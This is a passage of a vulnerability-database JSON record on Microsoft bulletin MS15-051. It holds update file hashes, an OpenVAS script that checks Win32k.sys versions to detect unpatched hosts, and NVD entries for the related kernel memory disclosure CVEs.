btn-link link-expand-text\"><span class=\"bold btn-link\">File hash information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">SHA1 hash</th><th class=\"sbody-th\">SHA256 hash</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB3045171-ia64.msu</td><td class=\"sbody-td\">244587B36D7E82D315268046E73D3419DD603E52</td><td class=\"sbody-td\">AE0F76A5439C521608E5203CBD505E2964F51AC0EB6094E640889C4805B35BAE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB3045171-x64.msu</td><td class=\"sbody-td\">A96111F5702B4729B177A696326E8DC9E57098A7</td><td class=\"sbody-td\">24408616430A8B39D4465A9890CC0EB446492C86C3BF4DB4B71304998BC8B811</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB3045171-x86.msu</td><td class=\"sbody-td\">620EA5CB09E9D2D1C1902FB55140C5C97960B868</td><td class=\"sbody-td\">8006121E38502A58E70E9A85A38B91297AA2345FB95566EBCA1B1823E816B932</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB3045171-ia64.msu</td><td class=\"sbody-td\">E118BB9A405DA803A8B23F35B4B8D2740A21258E</td><td class=\"sbody-td\">8630F60B031BB6C0ADCB5462CDB49E519C1E3D389A119BA04B1D164F470E9DA9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB3045171-x64.msu</td><td class=\"sbody-td\">7BC15709A49983D14F746E7141EC1EDCDC71ADB5</td><td class=\"sbody-td\">B2A95E83161983805850EA3C06C5F4F5C649544857746C1C38B999DF1909A32E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB3045171-x86.msu</td><td class=\"sbody-td\">9AEDF5CEDA7F456ACD15F9FF8E7659D3C7E1DEE9</td><td class=\"sbody-td\">FC59D31BB53729CBF13F5D79A05349E2A6B4197611711AF4E734583F7301B370</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB3045171-x64.msu</td><td class=\"sbody-td\">B787644D4D3252D44DB394130C7A9A1ADB6740B2</td><td class=\"sbody-td\">C3F433C272B71C6E81A0D0AF796CA7FB9137F692D3DB32AEACBAC9DEFE24D4B0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB3045171-x86.msu</td><td class=\"sbody-td\">027BCB69F530DDCE6BB05187F49213E85C0A18DF</td><td class=\"sbody-td\">672C3FA4D08CAF5448486D36BB25AB0FB3C5DFB958EB5EB3D810D93529E8E62C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB3045171-x64.msu</td><td class=\"sbody-td\">71A6AFEF8AD048E56641B97BAAFDA787B98CAA66</td><td class=\"sbody-td\">7408B0330C95961C983E6294AB6AF615FA6EAEF0A12AC2ABFECF58367316E916</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB3045171-x86.msu</td><td class=\"sbody-td\">14EA14F7B808B29F452B198429932DFE660E638D</td><td class=\"sbody-td\">50AC479AE83A71A4DDF62F5FBE1F522268F904170C46E75BDD4B4FCAE540CC1C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-ia64-DEU.exe</td><td class=\"sbody-td\">4EAEDB9041E2A02F1CBDC397A59D9291BD9085C3</td><td class=\"sbody-td\">7EA950BAEEFBF6A996AD5F8FEEE604F20CE2AAD6295DA8C4FF91588A1F8190B7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-ia64-ENU.exe</td><td class=\"sbody-td\">42C90E2644544FB785C7F1EE4ED904C02B70A2BC</td><td class=\"sbody-td\">184CB189DE4B5E096F175DFBAA1D7F6BD8E961E5E6C51BFBE9E98EBDF217C049</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-ia64-FRA.exe</td><td class=\"sbody-td\">EA8F4577B1F34E781D689F00A51677C529D3A314</td><td class=\"sbody-td\">E99431C93EA155690EF5EFEE6B7EC06B57CBC0B48024036DD53406EC6023A4D1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-ia64-JPN.exe</td><td class=\"sbody-td\">B62B39E06277ACFEF4F900C711BB2E09C657B613</td><td class=\"sbody-td\">9CBEE002B448AF388A7FC95DCE7A4DD2FA1283476B61A5784C0D2553D34AE28C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x64-CHS.exe</td><td class=\"sbody-td\">7E54E45FD3F668C97F0E830E0F071A1B25502A98</td><td class=\"sbody-td\">7A88289E5F0C92890DD4EA9C85F83CE97A94C527EC477A03C63726AB14B55DEC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x64-CHT.exe</td><td class=\"sbody-td\">1D8B89C0C3E4717CF7903A7CA5BC2EC351D616F6</td><td class=\"sbody-td\">5E07309D3074AF5A9056BC6A92BD1B0815CBA4188B56FC30517FD7EA53D16FFD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x64-DEU.exe</td><td class=\"sbody-td\">865584B92193740FFC5CCEDF11FF67D5631A0754</td><td class=\"sbody-td\">B0747CA84CFAC4CF93C5C772867EEAB315A8B1B889FCC41581BE3AE3051A5D3A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x64-ENU.exe</td><td class=\"sbody-td\">A3129F8EA90CE3F49D432BE087BCB2C086B22728</td><td class=\"sbody-td\">461BB729719E9BC3ABDA29D6D5B4C8D20FBA74FB4CC40F886EFFC4AE100BDC86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x64-ESN.exe</td><td class=\"sbody-td\">5882B44F7402796D70B29C34A3757009C74CFA18</td><td class=\"sbody-td\">67B47DA2B1771D514A540DBD07816E3F7EEBE42F20EF82F6AE22CB602964B8BA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x64-FRA.exe</td><td class=\"sbody-td\">7D710D51407192ABDA507CE58B063A11A73078CD</td><td class=\"sbody-td\">874BC86503FC78DFBE0FFC4896007723525B4FECB987E42CD50B1BF9790A205C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x64-ITA.exe</td><td class=\"sbody-td\">FF5391B665D3757524795BC261914BA2F398B04F</td><td class=\"sbody-td\">BD86BFA696C0834957B4682DB988F2669BBCE9CB8D968D93740E6130229A7099</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x64-JPN.exe</td><td class=\"sbody-td\">390441641B45570BA10B05A1685B0A2E53FEFD36</td><td class=\"sbody-td\">DD39E8C4A1B64FB59029D348D0765D2EEBBB8AC6A33AF9C216A1469504F5A08A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x64-KOR.exe</td><td class=\"sbody-td\">ABD6F0F4BEA723F0CEBFCC7A3355737EB5286C9A</td><td class=\"sbody-td\">46246DF6F98FE753720402F91B85977C3FAB1A38331ACFF0E3029760EAF8D35D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x64-PTB.exe</td><td class=\"sbody-td\">823AC2F0E5B4A74530AAD2C63BE8255FBA833FDA</td><td class=\"sbody-td\">8F6F3CA8182781D4FFC3006B95BFE79FABE9270526E7FB61A2AE4DEF91A8DB56</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x64-RUS.exe</td><td class=\"sbody-td\">38A316E1E2837E1A5002ADA9A62D0CC2DD839213</td><td class=\"sbody-td\">32261A4A2974085FD356EE3226A781308D7F58BF8AE7169DC1D8A00EF794880D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-CHS.exe</td><td class=\"sbody-td\">D6DB53026F2372C2179BCCD3D0D78EDC5866843B</td><td class=\"sbody-td\">1EC4955C69D1221A9BB1A00111500DA87B17E3628485852B2F1FDAA988F72314</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-CHT.exe</td><td class=\"sbody-td\">3F108F3479A77B0B8775720B7D8364A4BC851D35</td><td class=\"sbody-td\">CF1D664E55F1488D158978C13EC91EF054D648EEA3BC8D3DCA292C7C14349E99</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-CSY.exe</td><td class=\"sbody-td\">7C7014EABA21B8581942712EFED6AB4548D9941D</td><td class=\"sbody-td\">E1509DADD5AB657ED1657A778B4BAED9D1DCB9E83F19C505019CFC50DA3EF510</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-DEU.exe</td><td class=\"sbody-td\">8D18201139A418D03194BF0C02EA2C05367B4C60</td><td class=\"sbody-td\">01584565C6883A091064229E0D8EE4605BAC196670CFC14563DE58E763391B1F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-ENU.exe</td><td class=\"sbody-td\">1EFAA58A56C7A1657D52368FC03C848A0DF02065</td><td class=\"sbody-td\">900D5B475D3627699C96E09FDA9958B635ACD3F3B7F4F5B1ACDEA5E9E50F8167</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-ESN.exe</td><td class=\"sbody-td\">F7B1291B5442570784012A403563802803002EBB</td><td class=\"sbody-td\">EAA5944B515F49E5EC84306675C1B1BB09EF7FC2F21592E553E8CD50251ACCB5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-FRA.exe</td><td class=\"sbody-td\">5BD1F9BD3D0FFB0BFC9DFAAC6CF33E085AB2B1EE</td><td class=\"sbody-td\">5034DDDFC13A61442159626C9E563CF4B5FB6BEADD7C697C4DE597DC24EBCD7C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-HUN.exe</td><td class=\"sbody-td\">71BF31CDD40641B8C5D7E138722BEF89F8F22C58</td><td class=\"sbody-td\">D83F21FEFBF5443FF93D656DF43FC56EF97839DF33E465F79BFBD496CB348FB5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-ITA.exe</td><td class=\"sbody-td\">2973B2F02006A8474E111F990908FDCD918509B9</td><td class=\"sbody-td\">6C080F8F350E9D48EE6036815803CE33A056CE5865128FF533EDD73E3D5AAA43</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-JPN.exe</td><td class=\"sbody-td\">521FD8869F610211BF7A8037C934B3B35B81F30A</td><td class=\"sbody-td\">26E337842747D3BD051C68B292CC70FE661DEF2408F1DE56B56932B0F39F4DE9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-KOR.exe</td><td class=\"sbody-td\">E941CAD25C216EB06198A765743F66CFB40BAC80</td><td class=\"sbody-td\">40F5BA2AAE85D72BC7AA5EC067787A59AF40E250DB0E8B3493A82945CC8A504F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-NLD.exe</td><td class=\"sbody-td\">81D0F67B3D1A084B30AFFAE04B7604A22FAA82AB</td><td class=\"sbody-td\">4D46B6A5EFAB61529C12FC7D447C0B58E7D9C8D97DC76B044A9730E3777515ED</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-PLK.exe</td><td class=\"sbody-td\">B75CA95EDEF6C502F8CAF8448BEE5B569B97F4B3</td><td class=\"sbody-td\">DEEEC6B0602B946C6DA2A16F591D4682E912450D4521ADD7044F6A5BF07D64B5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-PTB.exe</td><td class=\"sbody-td\">3F2957CBF037CF2D914C39A64ED7EFFB7879422C</td><td class=\"sbody-td\">FF41E5425D91E74DC93D59727F94D7FA31EF30C7AAD11A1D992954AB059482D8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-PTG.exe</td><td class=\"sbody-td\">31658A69D55A28E63EB6AC9EB52BF08CC3FA25F9</td><td class=\"sbody-td\">885D115CF5A98E2B8E32682182E9F714BE1A89BA8A9D06D70C0A0147B932F239</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-RUS.exe</td><td class=\"sbody-td\">070F8DF1DB761134134ADD755B56B7DC51300A24</td><td class=\"sbody-td\">32CF3A5A206E2710D1BF804C6B792468D5A4DEAD729B83E82666EB26EC77784D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-SVE.exe</td><td class=\"sbody-td\">379F14B4B8154AC0483AB01BD45DD4E678D1378A</td><td class=\"sbody-td\">194036D91AD629359AB3F8FC532649B8CAE41364B06AD7AF6A8B9F0CDBEA5AE6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3045171-x86-TRK.exe</td><td class=\"sbody-td\">1E102AF5B7739DDC6E1C75D56181F8C72CAFC8D0</td><td class=\"sbody-td\">70BF8656007077ABD17E8F0C01F681B55135FB694E2BB8E5E5F22A8B790F2587</td></tr></table></div></div><br/></span></div></div></div></div></body></html>", "edition": 2, "modified": "2015-06-24T22:39:58", "id": "KB3057191", "href": "https://support.microsoft.com/en-us/help/3057191/", "published": "2015-05-12T00:00:00", "title": "MS15-051: Vulnerabilities in Windows kernel-mode drivers could allow information disclosure: May 12, 2015", "type": "mskb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-06-10T19:50:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1676", "CVE-2015-1677", "CVE-2015-1679", "CVE-2015-1678", "CVE-2015-1680"], "description": "This host is missing an important security\n update according to Microsoft Bulletin MS15-051.", "modified": "2020-06-09T00:00:00", "published": "2015-05-13T00:00:00", "id": "OPENVAS:1361412562310805381", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805381", "type": "openvas", "title": "MS Windows Kernel-Mode Driver Privilege Elevation Vulnerability (3045171)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# MS Windows Kernel-Mode Driver Privilege Elevation Vulnerability (3045171)\n#\n# Authors:\n# Deependra Bapna <bdeependra@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805381\");\n script_version(\"2020-06-09T05:48:43+0000\");\n script_cve_id(\"CVE-2015-1676\", \"CVE-2015-1677\", \"CVE-2015-1678\", \"CVE-2015-1679\",\n \"CVE-2015-1680\");\n script_bugtraq_id(74483, 74494, 74495, 74496, 74497);\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 05:48:43 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-05-13 11:36:27 +0530 (Wed, 13 May 2015)\");\n script_name(\"MS Windows Kernel-Mode Driver Privilege Elevation Vulnerability (3045171)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft Bulletin MS15-051.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to the kernel-mode driver\n leaking private address information during a function call\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to kernel memory contents that contain sensitive\n information about the system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8 x32/x64\n\n - Microsoft Windows Server 2012/R2\n\n - Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows 2003 x32/x64 Service Pack 2 and prior\n\n - Microsoft Windows Vista x32/x64 Service Pack 2 and prior\n\n - Microsoft Windows Server 2008 x32/x64 Service Pack 2 and prior\n\n - Microsoft Windows 7 x32/x64 Service Pack 1 and prior\n\n - Microsoft Windows Server 2008 R2 x64 Service Pack 1 and prior\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/kb/3045171\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS15-051\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2003:3, win2003x64:3, winVista:3, win7:2, win7x64:2,\n win2008:3, win2008r2:2, win8:1, win8x64:1, win2012:1,\n win2012R2:1, win8_1:1, win8_1x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Win32k.sys\");\nif(!sysVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win2003x64:3,win2003:3) > 0)\n{\n if(version_is_less(version:sysVer, test_version:\"5.2.3790.5615\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\n## Currently not supporting for Vista and Windows Server 2008 64 bit\nif(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n if(version_is_less(version:sysVer, test_version:\"6.0.6002.19372\") ||\n version_in_range(version:sysVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.23679\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0)\n{\n if(version_is_less(version:sysVer, test_version:\"6.1.7601.18834\") ||\n version_in_range(version:sysVer, test_version:\"6.1.7601.22000\", test_version2:\"6.1.7601.23037\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nif(hotfix_check_sp(win8:1, win8x64:1, win2012:1) > 0)\n{\n if(version_is_less(version:sysVer, test_version:\"6.2.9200.17343\") ||\n version_in_range(version:sysVer, test_version:\"6.2.9200.20000\", test_version2:\"6.2.9200.21456\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\n## Win 8.1 and win2012R2\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0)\n{\n if(version_is_less(version:sysVer, test_version:\"6.3.9600.17796\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2020-10-03T12:49:48", "description": "The kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow local users to bypass the ASLR protection mechanism via a crafted function call, aka \"Microsoft Windows Kernel Memory Disclosure Vulnerability,\" a different vulnerability than CVE-2015-1677, CVE-2015-1678, CVE-2015-1679, and CVE-2015-1680.", "edition": 3, "cvss3": {}, "published": "2015-05-13T10:59:00", "title": "CVE-2015-1676", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1676"], "modified": "2019-05-13T19:55:00", "cpe": ["cpe:/o:microsoft:windows_vista:-", "cpe:/o:microsoft:windows_server_2003:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_8:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2015-1676", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1676", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_8:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2003:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:49:48", "description": "The kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow local users to bypass the ASLR protection mechanism via a crafted function call, aka \"Microsoft Windows Kernel Memory Disclosure Vulnerability,\" a different vulnerability than CVE-2015-1676, CVE-2015-1677, CVE-2015-1678, and CVE-2015-1679.", "edition": 3, "cvss3": {}, "published": "2015-05-13T10:59:00", "title": "CVE-2015-1680", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1680"], "modified": "2019-05-15T17:01:00", "cpe": ["cpe:/o:microsoft:windows_vista:-", "cpe:/o:microsoft:windows_server_2003:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_8:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2015-1680", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1680", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_8:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2003:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:49:48", "description": "The kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow local users to bypass the ASLR protection mechanism via a crafted function call, aka \"Microsoft Windows Kernel Memory Disclosure Vulnerability,\" a different vulnerability than CVE-2015-1676, CVE-2015-1678, CVE-2015-1679, and CVE-2015-1680.", "edition": 3, "cvss3": {}, "published": "2015-05-13T10:59:00", "title": "CVE-2015-1677", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1677"], "modified": "2019-05-13T20:17:00", "cpe": ["cpe:/o:microsoft:windows_vista:-", "cpe:/o:microsoft:windows_server_2003:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_8:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2015-1677", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1677", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_8:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2003:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:49:48", "description": "The kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow local users to bypass the ASLR protection mechanism via a crafted function call, aka \"Microsoft Windows Kernel Memory Disclosure Vulnerability,\" a different vulnerability than CVE-2015-1676, CVE-2015-1677, CVE-2015-1678, and CVE-2015-1680.", "edition": 3, "cvss3": {}, "published": "2015-05-13T10:59:00", "title": "CVE-2015-1679", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", 